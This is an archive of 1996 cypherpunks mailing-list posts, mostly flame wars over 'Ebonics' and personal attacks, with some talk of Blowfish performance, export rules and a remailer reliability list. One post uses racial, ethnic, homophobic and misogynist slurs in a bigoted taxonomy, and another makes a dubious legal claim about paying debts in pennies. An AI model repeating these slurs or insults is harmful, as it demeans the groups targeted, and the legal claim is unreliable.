     addressed as "reading history books".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 22 Dec 1996 22:17:36 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007801aee25b84a198@[207.167.93.63]>
Message-ID: <199612230617.WAA04103@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


poor timmy laments that no one responded to his latest
gedanken masterpiece. I am very pleased to be the one to  
relieve him of his loneliness.

Timmy writes:
>Fortunately for the bulk of us, the likely number of deaths and economic
>losses from such crimes of kidnapping, extortion, and even murder for hire,
>is still likely to be vastly lower than the number of deaths caused by
>powerful central governments enriching themselves and their cronies with
>foreign wars. Not to mention the deaths in the Drug War, the lives wasted
>in other interferences in private behavior, etc.

imho, it's a very warped kind of mind that insinuates some evil is no
big deal because greater evils exist in the world. 

it's an argument I see often among the libertarians 
around here. "what's the big deal
about murder? govt's do it all the time. everyone should be able to
murder anyone if govt's do it. why, the right to 
murder people is an inalienable right!!". of course the arguments
are never made in this language-- the fun is spotting it in the
rhetoric.

>This is why I look forward to this Brave New World of fully untraceable
>communications and fully untraceable economic transactions.

ah, an even more warped mind that not merely condones it but
"looks forward to it"

careful, timmy, your slime is showing!!

(it would be fun to debate you publicly some day on your true beliefs, but
alas, you never bite. oh well, I stay amused well enough..)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 22:26:15 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Ebonics
In-Reply-To: <199612222159.QAA10214@mercury.peganet.com>
Message-ID: <32BE25B0.76B6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Rosen wrote:
> I would like to conclude this Ebonics issue. The main problem is
> understanding. Some people have bad accents, either Southern or Ebonic,
> both of which are often difficult to understand. I am not disputing the
> fact that everyone should learn a standard language, but I object to the
> racial undertones of the messages - that black people are stupider than
> white people, and gross ignorance of environmental conditions. Whatever.

1. What do you mean conclude?  For whom?

2. Rather than hypothesize a "standard" language, the language evolves
   and generates the standard.  Just relax and enjoy it.

3. Black people are/are not stupider than what?  Mark, you should go
   live in the deep South for awhile, and become part of it, and
   watch the outsiders come in and tell your friends and neighbors on
   the TV, on radio, and in in-person seminars that they speak "wrongly"
   and should lose their Southern "accents", as though they were something
   to be ashamed of.

   Mark, you need to learn simple logic.  Instead of saying "...are often
   difficult to understand", you should say "...are often difficult for
   *me* to understand".

   You see, Mark, I could understand you in speech I am sure, and I can
   also understand the Southern speech by-and-large, but it's you who
   seems to have the limitations. Now you want to force people who don't
   talk like you to talk like you, otherwise you won't deal with them.

   What a petty, narrow-minded person you must be, and how sad.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 20:20:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Slaughter
In-Reply-To: <3.0.32.19961222165943.006b21a8@netcom13.netcom.com>
Message-ID: <iVFDZD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> writes:
> And the firepower that makes the difference.

A Mac luser rants about firepower?

He he he.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 20:20:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612230030.QAA18048@mail.pacifier.com>
Message-ID: <8wFDZD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> At 01:30 PM 12/22/96 -0500, Mark Rosen wrote:
> >	Hehe. What I mean to say is that since both Ebonics and a Southern accent
> >are learned during early childhood, you have no control over how you talk.
>
> This is not true.  The recent commentary and interviews I've seen on this
> subject make it clear that the people speaking "Ebonics" are quite capable
> of speaking in standard English, and do so when they find it, er, convenient.

How does this tie into assassination politics?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sun, 22 Dec 1996 23:09:44 -0800 (PST)
To: jim bell <cypherpunks@toad.com
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <3.0.32.19961222232041.0069e518@best.com>
MIME-Version: 1.0
Content-Type: text/plain



Software that is imported becomes subject to ITAR with respect to
re-exportation, of course (but of course IANALetc.)  

If you can't demonstrate to MSFT that you are
playing by the rules --such that you have the proper export papers
for your code if you plan to export it, for example-- they won't sign,
even if developed outside US.

So: you develop a CSP outside US ... you have to IMPORT it to get it signed.
It becomes subject at that point to ITAR export regs.  Unless you demonstrate
that you fulfull those requirements, no signature.  So there's no relief by
looking at just exporting the signature.

?


At 07:21 PM 12/22/96 -0800, you wrote:
>At 07:36 AM 12/18/96 -0800, geeman@best.com wrote:
>>
>>Microsoft had to agree to validate crypto binaries against
>>a signature to make sure they weren't tampered with, in 
>>exchange for shipping crypto-with-a-hole.  They will
>>sign anything (theoretically) if it has the export
>>papers and all.  Or without, if you affadavit it is not
>>for export.
>>
>>They do not themselves impose any restrictions on crypto
>>strength.
>>I'm not expressing political position here, just conveying facts ....
>
>What if the software involved was IMPORTED?  Moreover, is legal to export 
>just the signature?
>
>Jim Bell
>jimbell@pacifier.com
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sun, 22 Dec 1996 21:23:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Legality of requiring credit cards? (fwd)
Message-ID: <m0vc2qk-0002wCC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Sun, 22 Dec 1996 15:43:28 -0500 (EST)
> From: Michael Gurski <mgursk1@umbc.edu>
> Subject: Legality of requiring credit cards?
> 
> It's that wonderful season again, when all the assholes are out in
> force, and people feel obligated to purchase merchandise to give to
> each other.  For various reasons, I don't believe in credit cards, and
> yet, trying to pay for something by personal check at the local
> Hecht's, they either *require* a credit card, or go through the Nazi
> check-warranty company Equifax.  
> 

Equifax does business by tracking reputations, as do all credit
reporting companies. That's how a free market handles bad checks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 23 Dec 1996 00:01:11 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Mr. May's Posts.  Other Things.
Message-ID: <199612230801.AAA24862@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 21 Dec 96 at 10:36, Dr.Dimitri Vulis KOTM wrote:

> Interesting. Paul Bradley does not consider Timmy May's (fart)
> latest rants on "ebonics" and "colored race" to be racist? I think
> Timmy May hates blacks even more than he hates Jews. Let's quote
> Timmy's sick garbage on soc.culture.african.american and ask if they
> find it offensive and racist.
> 

Yes, Dr., this latest tripe that has spewed forth from Tim's keyboard 
reeks of bigotry.  And all this time I felt you may have been too 
hard on him.  This latest rant of his has made me reconsider your 
rough treatment of Mr. May.  I kinda think he deserves a slapping 
right now.

I find Mr. Mays comments quite racist and are quite off topic for 
this list.

I would much rather talk about what rights I have to do bulk, 
targeted e-mailings!  Or the fame of "The Spam King"  I saw him on a 
TV show called The Web on the SciFi channel.  This guy is a great 
example of the old adage that there is no such thing as bad publicity.

Just my two cents.  It's been too long since I last posted, but I was 
compelled to post about this racist crap.  I went to an inner-city 
school in South Gate, California and found it better to be friendly 
with anyone who would be my friend, despite the color of their skin.  
I went into the US Military and that idea was reinforced there.  So I 
hate to hear people who are unwilling to find humanity behind a 
darker color skin.  That just pisses me off!

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sun, 22 Dec 1996 23:38:42 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Elboa, Elbonics, Donner & Blitzen
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32BE4027.330A@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> By the way, I'll be off the list for a while, for the usual seasonal
> reasaons. I'm in a tryst with Gilmore and Hughes, extortion and untraceable payments, cookin and jivin--shameful "garbage."
> --Tim May

Tim,
  While your message came through somewhat garbled, it made it clear
that the holiday season there in big city has lost its original
innocence.
   Damn, and I'm stuck here in butt-fuck Saskatchewan (no pun intended).

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 22 Dec 1996 16:25:34 -0800 (PST)
To: Lurker <lurker@mail.tcbi.com>
Subject: Re: Off topic litter on Cyperpunks
In-Reply-To: <3.0.32.19961222141617.006999b0@mail.tcbi.com>
Message-ID: <Pine.LNX.3.95.961223002321.1469A-100000@batcave.intrex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Dec 1996, Lurker wrote:

> What has happened to cypherpunks?  I joined this mailing list more recently
> than many others who recieve it, but most reacently it has gone downhill.
> 
> The descriptions I have read (and I have read many) all state that this
> list is deadicated to the discussion of cryptography issues.  Where the
> hell is the discussion about cryptography?
> 
> Three fourths of the messages I have been recieving are off topic (Ebonics
> and "Slaughter").  If I wanted to read about current events and holocost I
> would have joined groups that were specified for discussion of those.
> 

Hrmm.. actually.. Ebonics is more on topic than you realise.  The Ebonics
that they're teaching is really nothing more than a simple trnsposition
cypher.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
		-- C. S. Lewis


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMr3RODCdEh3oIPAVAQHbuQf9Hlw9gKn44msVwuH7nnySPtjiKaOc/L5h
40YzNguhZD3jDHmQ9sC7gR+u+mo+X9IERJd05GUKKAYGIvqL0nlzEFSDRUSPPkno
oy9D8JlH8DehM54+H2AJjgzm4Y9+fj+E8GENs4AZUgbInKjtv+nzBKpoWUEr2SIp
EMSHEm5MHfLZbm0OX7o3xPE5x9wVuaOt6cSGJAOYsFW3faxhn5zRyq7w08DCU8gX
61Np62pqQgmGp/aUQAQxggNXTflGIWYNIf/Wsvq8B922k+j87nr3DYQYXCqYVKwy
ORcOe7pxmjB77qAXdpxmBGt3E3VFS5UrhZ5XeMs6lzn7F+bAa5dm7Q==
=0bc0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 22 Dec 1996 16:31:12 -0800 (PST)
To: Michael Gurski <mgursk1@umbc.edu>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.OS2.3.95.961222151556.7261A-100000@klinzhai.nanticoke.net>
Message-ID: <Pine.LNX.3.95.961223002651.1469B-100000@batcave.intrex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Dec 1996, Michael Gurski wrote:

> It's that wonderful season again, when all the assholes are out in
> force, and people feel obligated to purchase merchandise to give to
> each other.  For various reasons, I don't believe in credit cards, and
> yet, trying to pay for something by personal check at the local
> Hecht's, they either *require* a credit card, or go through the Nazi
> check-warranty company Equifax.  However, it doesn't stop there...only
> SOME departments seem to have this requirement (Electronics/Luggage
> not requiring).  Is it legal to require credit cards?

The only real legality of requiring some form of payment is that if they
take one form of federal reserve currency (eg the one dollar bill) they
have to take any form of federal reserve currency (eg the penny).  This
means that when your parking ticket says you can't pay in change, you can
still pay in change.  Legally (according to CNN anyway, i've never
bothered to actually go look it up) if you ofer to pay something in
change, and they decline, you can give them one warning, and _assuming a
debt is previously incurred (eg parking ticket, not new pants) you don't
have to pay.

Unfortunatly, they can decline cash/change completely, or decline checks,
or decline credit cards.  But if they take one dollar bills, go by the
bank first and get it in pennies.  Pay with that.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
		-- C. S. Lewis


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMr3SkTCdEh3oIPAVAQH6Lgf/SthkfxgY7R0iJltRFOmdLEpqOo5g0a5P
mWCi1nUrHzEZha3ij+gntxIWCFRaY/1qLyk1RJgDHAiFa5gWQBULxy6jyTBm5Zcz
NMXkd8VardL9AmjmJd3LccCx9VMHo8/YqZ/hQOJXFL4/QuwDyNLS+vbUmNKPPGzD
d0ewCoQmgHxh2KpHYE1+O2jo/4yxRGr6Vl7jrE4HZ6GQ0U+YF7+WIf7mVP9gwZHw
+XNRgdcT56iqtPhISPzq5NH/4djwisPNYat/ywW6u+HSfaFHhi+79mWOlprpEiK4
Vfa9iRdwTCkQuVTDJdbFuqnsQHGxBrgDsBUmFLH0WNT0CXCpECEgyg==
=aMoc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jazzmin Belle Sommers <jazzmin@ou.edu>
Date: Sun, 22 Dec 1996 22:46:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "the world is half women..."
Message-ID: <32be2aa4043b004@cliff.ou.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Dale Thorn and Tim May mutually blundered:
>>Ya' know, guys, the world is half women, even though they're not on
>>the c-punks list.  Get in touch with them.  They're fun people.
>Ah, it's been a while since we had the "why aren't more women on the list?"
>discussion.  Frankly, women are of course welcome. If the list interests
them, they are
>welcome to subscribe. As it has always been.

Oh, THANK YOU SO MUCH for discussing us in the third person.  Guess what.
There ARE women on the list (myself being one of them).  (I thought that the
men/women ratio was more like 46/54.)

>That so few women are subscribers, or remain subscribers, or attend
>Cypherpunks physical meetings....well, that's a larger issue involving
>familiar issues:

(chop -- those issues being libertarianism and other political
nonsequiters.) (FYI:  I'm a political science major and the secretary of the
OU College Libertarians, neener neener.)

>(I've explained crypto anarchy to many men and women over the past 6-8
>years. I've seen the guy's get agitated, or bothered, but usually
>_interested_. I've seen eyes light up as they understand the likely
>implications of untraceable payments, anonymous communications, avoidance
>of Big Brother, etc. (CHOP CHOP) I think it's why we seem to have at most a
couple of active women subscribers at any given moment.)

This particular woman says that it's sooooo tiresome to wade through a lot
of posturing and (even worse) the "me-toos" wherein people quote the entire
post and then say, oh, yeah, I agree with that also.  It's soooo easy to
quit even reading the threads and just delete the whole thing.

SUBTLE HINT MODE ON
(Ah, so what do you propose, then, Miss Smartypants?) (AHEM!  It's my brain
that's smart, you lecher!)  I'm on other lists and I've noticed that when
they go to digest form much of the me-too-ness drops out.  Is it that
important to get 100 emails a day, if 80% of it is crap?

Now, this part might sound more "womanish" -- it's nice to get an idea of
the people posting, and have PRIVATE conversations.  Most people don't care
to see blanc and dale bash it out over fifteen posts.  It's junk mail
littering our in boxes!  It's TASTELESS!
...furthermore, it's not cool.  [Rabid soapboxing about what is and isn't
cool omitted.]

>So, Dale, feel free to recruit more women to this and other lists. But
>don't presume from the traffic you see here--or from comments about the
>utter stupidity of little Jessica Dubroff, her pilot, her parents, and the
>complicitous news media--that we need a lecture on getting in touch with
>women.

Oh, yes you do.  Consider yourself lectured.  Stick to the topics, or stray
on a RELATED subject.  Jess Dubroff ISN'T.  Complicitous news media IS.


ENOUGH!  No followup posts!  Take my advice and smoke it!  Er, wait.  That
doesn't sound right.  And for those of you who are just WAITING to flame me,
don't bother.  I'm not a feminazi, not an "uppity woman", just a chick
who'll {spontaneous hot-tempered threats deleted upon second thought}.
Email privately if you care to respond.


Jazz Sommers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sun, 22 Dec 1996 16:07:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Ebolics Virus may be contained
In-Reply-To: <v03007800aee340007037@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.961223010146.174A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Timothy C. May wrote:

> By the way, both Jesse Jackson and famed poetess Maya Angelou have
> denounced the Oakland School Board's adoption of "Ebonics" as shameful
> and a travesty. Jackson said black children should not be encouraged to
> speak "garbage."

Isn't that what Farrakan (sp?) has been saying from the start of
his political career? I thaught he was the Man nowadays (but I
don't live in the US and could have gotten it backwards).

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sun, 22 Dec 1996 23:56:41 -0800 (PST)
To: James Bugden <70023.3247@compuserve.com>
Subject: Re: The Ebonic Plague
In-Reply-To: <961223024816_70023.3247_CHU91-1@CompuServe.COM>
Message-ID: <32BE56F0.1B55@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


James Bugden wrote:
> Scum - you know - it's like crap - it's the stuff that floats to the top.
> Or is that the cream?

  Life is like a bowl of chili. If you don't stir it every now and again,
all of the scum rises to the top.
  (From the kitchen wall at Xalapeno Charlie's, Austin, TX, circa 1982)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 22 Dec 1996 22:57:11 -0800 (PST)
To: "Dale Thorn" <dthorn@gte.net>
Subject: Re: Ebonics
Message-ID: <199612230641.BAA13632@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> 1. What do you mean conclude?  For whom?
	I mean conclude. For me. I am the authority on all. I am just personally a
little sick of this Ebonics thing, as we have obviously irreconcilable
positions. I tried to take a concilliatory position with which all would
agree. It has little to do with cryptography and is a stretch even for this
generally weird mailing list.

> 2. Rather than hypothesize a "standard" language, the language evolves
>    and generates the standard.  Just relax and enjoy it.
	No. I'm right and you're wrong. Face it. :-)

> 3. Black people are/are not stupider than what?  Mark, you should go
>    live in the deep South for awhile, and become part of it, and
>    watch the outsiders come in and tell your friends and neighbors on
>    the TV, on radio, and in in-person seminars that they speak "wrongly"
>    and should lose their Southern "accents", as though they were
something
>    to be ashamed of.
> 
>    Mark, you need to learn simple logic.  Instead of saying "...are often
>    difficult to understand", you should say "...are often difficult for
>    *me* to understand".
	I personally have no problem understanding Southern accents. Other people
have stated that they have problems understanding Ebonics, so I was just
playing devil's advocate and taking another, conflicting position. I sense
that one of the reasons why *some* people are so disgusted with Ebonics is
that only black people speak it. I am just responding to those racist
sentiments (Ahem. Timothy May) and trying to present a white example of
muddled speech. Also, the entire issue of clarity of speech is relative and
*will* be different for each person, another thing many people are
ignoring.

>    You see, Mark, I could understand you in speech I am sure, and I can
>    also understand the Southern speech by-and-large, but it's you who
>    seems to have the limitations. Now you want to force people who don't
>    talk like you to talk like you, otherwise you won't deal with them.
> 
>    What a petty, narrow-minded person you must be, and how sad.
	Again, I was being devil's advocate and imitating other people's distaste
with Ebonics. Your rather biting comments describe their narrow mindedness.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Sun, 22 Dec 1996 22:57:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Certified primes
Message-ID: <199612230656.BAA18584@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy `C' May is a certified sexual pervert who wears women's underwear.

     \\\
    (0 0)
_ooO_(_)_Ooo____ Timmy `C' May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erase56@aol.com
Date: Mon, 23 Dec 1996 01:23:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Super Crypto
Message-ID: <961223042314_404470627@emout11.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Can someone help me on finding a program with super crypto.  E-mail me back
at Erase56@aol.com with the program attatched or e-mail me on where can I
find it. On the internet of where ever.  Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgarswank@juno.com (Edgar W Swank)
Date: Mon, 23 Dec 1996 04:38:20 -0800 (PST)
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Re: Blowfish Performance
Message-ID: <19961223.043602.2974.1.edgarswank@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

David Stoler recently commented:

>I ftp'd the Blowfish implementation from ftp.ox.ac.uk and ran some
>benchmarks.
>
>Encryption and decryption are faster than the fastest DES implementation
>I've found, but the key expansion (subkey generation) is slow.
>
>On a 100 Mhz PowerPC I get the following results:
>
>Key expansion:
>350 keys per second = 3.33 milliseconds per key
>
>Encryption/Decryption:
>190,000 8 byte blocks per second = 5.26 microseconds per block
>
>This is 40% faster (encryption/decryption) than the best DES I have.
>
>Questions:
>...
>3.  Is there a way to improve key expansion performance for applications
>that change keys frequently?  (Other than caching expanded keys...)

Actually this (slow key expansion) is a feature. It limits the
speed of a brute-force attack, since each new key to be tried
must be expanded.

What applications need to change keys more than once a second?

I'd also be interested in comparisons of Blowfish to IDEA.

Edgar W. Swank   <EdgarSwank@Juno.com>
                 (preferred)
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Edgar W. Swank   <EdgarSwank@Freemark.com>
Home Page: http://members.tripod.com/~EdgarS/index.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMr4fSt4nNf3ah8DHAQHycwP7BWTgyHVVZrtEhlMQKmSFFQGcMKqxaa5V
y7D0OSVGTuddkwFDsVR7Qt3YGV0q3sMWbXFbicn2R/25rBbFNzA8d2rdgIxJVEzZ
0uKb1xdWkVR7GLIlQDciQW/zdQxdXjkiQ9sVbUJtPwYzUdZt6us3Izac1FZ4fKAX
mvlqa4yWG58=
=Tmc6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Mon, 23 Dec 1996 03:34:17 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: the word is "NIGGAZ"
In-Reply-To: <Fu5cZD12w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961223062155.26462F-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> >From cypherpunks-errors@toad.com  Sun Dec 22 18:36:40 1996
> To: cypherpunks@toad.com
> Subject: Re: the word is "NIGGAZ"
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> 
>    Actually the word is "niggus."  "Niggaz" is the white man's nasal rendition 
> of this term.  

Nope, that is from the black man.  In JET Magazine, they say "NIGGAZ,"
and they are the nationwide authority on the black subculture.

If you do not read JET, you do not know anything about the blacks,
unless you live next to them like we do in the city here.

"Soul Brothers" hate "niggers," because a "nigger" is defined 
as somebody who:

1) lies,
2) cheats,
3) steals,
4) stinks, or
5) fucks with your woman.


There are	good blacks and bad niggers,
		good jews and bad kikes
		good dagos and bad wops
		good gay boys and bad faggots
		good ladies and bad cunts
		
		good and bad of all kind...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 23 Dec 1996 06:53:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199612231450.GAA00504@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel and winsock remailers accept PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 23 Dec 96 6:49:12 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
extropia remail@miron.vip.best.com        ._____.-     60:10:34  95.00%
mix      mixmaster@remail.obscura.com     ++*.-*++-     5:25:14  71.83%
dustbin  dustman@athensnet.com            ++..++--+     2:13:28  67.50%
nym      config@nym.alias.net             *#+..+###     1:20:12  67.08%
cyber    alias@alias.cyberpass.net        **+**+* *       33:27  67.01%
replay   remailer@replay.com              +*+- +++-       33:30  66.29%
reno     middleman@cyberpass.net          ---------     2:26:15  65.86%
exon     remailer@remailer.nl.com         ##* * **+        3:12  65.36%
middle   middleman@jpunix.com             --------      2:43:49  65.05%
balls    remailer@huge.cajones.com        *********       12:37  64.91%
haystack haystack@holy.cow.net            *-++*#**         5:07  64.87%
lucifer  lucifer@dhp.com                  +++++++++       34:36  64.70%
winsock  winsock@rigel.cyberpass.net      -..-----      5:29:44  63.62%
weasel   config@weasel.owl.de             ++ +-++-      1:29:46  57.96%
squirrel mix@squirrel.owl.de              ++++-+++      1:27:45  57.55%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
